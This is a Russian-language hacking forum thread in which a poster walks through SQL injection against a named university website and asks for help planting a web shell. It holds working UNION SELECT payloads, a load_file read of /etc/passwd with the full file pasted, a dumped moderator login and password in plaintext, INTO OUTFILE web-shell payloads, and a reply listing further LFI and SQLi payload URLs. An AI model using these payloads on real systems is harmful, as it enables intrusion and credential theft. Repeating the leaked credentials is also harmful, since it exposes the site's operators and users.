Обсуждение скуел инъекции и веб щели.
1. заданный вопрос выглядит так: +union+select+1/* так же далее можно 2,3, 4,5,6/* пока не исчезнет ошибка и на экране не появится число. У меня появилось число 1, взамен числа 1 я вставлял переборы version(), database(),user()
Получаем user:muha@irq.kaznpu.kz
database:kaznpu
version:5.0.37-community-log
Далее задаю вопрос:+UNION+SELECT+table_name+from+information+wehre+schema.tables='forum'+limit+1,1/*
Получаем:
также перебираю limit 2,1 3,1 4,1 и так далее
COLLATIONS
CHARACTER_SETS
COLLATION_CHARACTER_SET_APPLICABILITY

COLUMNS

COLUMN_PRIVILEGES

KEY_COLUMN_USAGE

PROFILING

ROUTINES

SCHEMATA

SCHEMA_PRIVILEGES

STATISTICS

TABLES

TABLE_CONSTRAINTS

TABLE_PRIVILEGES

USER_PRIVILEGES

VIEWS

document

main

menus

moderator

picture

zakup

annons

count_link

forum

hor_menu


Далее задаю вопрос: вывод login, passwd
+union+select+load_file(0x2F6574632F706173737764)+from+information_schema.tables/*

Потом получаем результат, как мне сказали на форуме, файлы от user
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash

Потом задаю вопрос как узнать логин и passwd администратора
Быглядит так:

+UNION+SELECT+concat_ws(0x3a,login,pswd,fio)+from+moderator/*
Получаем
muha:gauhar
muha-логин
gauhar -пароль


Далее узнаешь версию compile_
+union%20select%20@@version_compile_os%20/*
pc-linux-gnu

дальше мне осталось узнать, только щель и залить ее, подобные подборы у меня не получились. Показываю свои столбцы:
+union+select+'%3C?+system($_GET[cmd])+?%3E'+into+outfile+'/www/htdocs/kaznpu/cmd.php'+from+table/*

У кого ест своя версия, есть советы может что-то я не правильно делаю, выбивает всегда ошибку:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /www/htdocs/kaznpu/function.php on line 16

+union+select+load_file(0x2F6574632F706173737764)+­­from+information_schema.tables/*
а что  тебе нужно еще что то подобное могу дать

https://forum.antichat.ru/printthread.php?t=21336&page=518&pp=10+union+select+1,2,3,4/*
посмотри этот зейт там сертификатом помоему заходиш

а лутче бы о шелле расказал

http://server/wolf.php?file=/etc/passwd
http://server/wolf.php?file=../../../etc/passwd
http://server/wolf.php?file=../../../etc/passwd%00
http://server/wolf.php?id=2+union+select+null,null/*
http://server/wolf.php?id=2+union+select+user password+from+mysql.user/*
http://server/wolf.php?id=2+union+select+user,password+from+mysql.user%00
http://server/wolf.php?id=2'+union+select+user,password+from+rnysql.user/*
http://server/wolf.php?id=2'+union+select+'<?+system($_GET[cmd])+?>'+into+outfile+'/var/http/server/cmd.php'+from+testtablel/*
+union+select+1,concat(username,0x3a,password,0x3 a,email),3,4,city+from+users+limit+31000,31001/*
+union+select+<?system($_GET['cmd']);?>+from+table1+into+outfile+'/path/to/shell'/*
+union+select+'<?system($_GET[cmd]);?>'+from+table1+into+outfile+'/path/to/shell'/*
+union+select+1,2,3,"<?system($_GET[cmd]);?>",5,6,7+from+mysql.user+into+outfile+'/home/site/www/shell.php'/*
это примеры и они могут быть не совсем правельными хотя если понемаеш то сам знаеш

отпештесь как получить shell если известно login and passwd
что дальше кто нибуть напешие
http://www.kaznpu.kz/kz/?annons=-1+UNION+SELECT+concat_ws(0x3a,login,pswd,fio)+from+moderator/*

да    ты крут, взломал  универ в моем городе     . дай аську есть пара вопросов

ну если у тебя есть пароль и логин, кстати если есть права администратора, я так понял ты не можешь найти место куда залить шелл ?

http://www.kaznpu.kz/kz/?annons=-1
дальше подставиш к +UNION+SELECT+table_name+from+information_schema.tables+limit+1,1/*

я думаю слишком поздно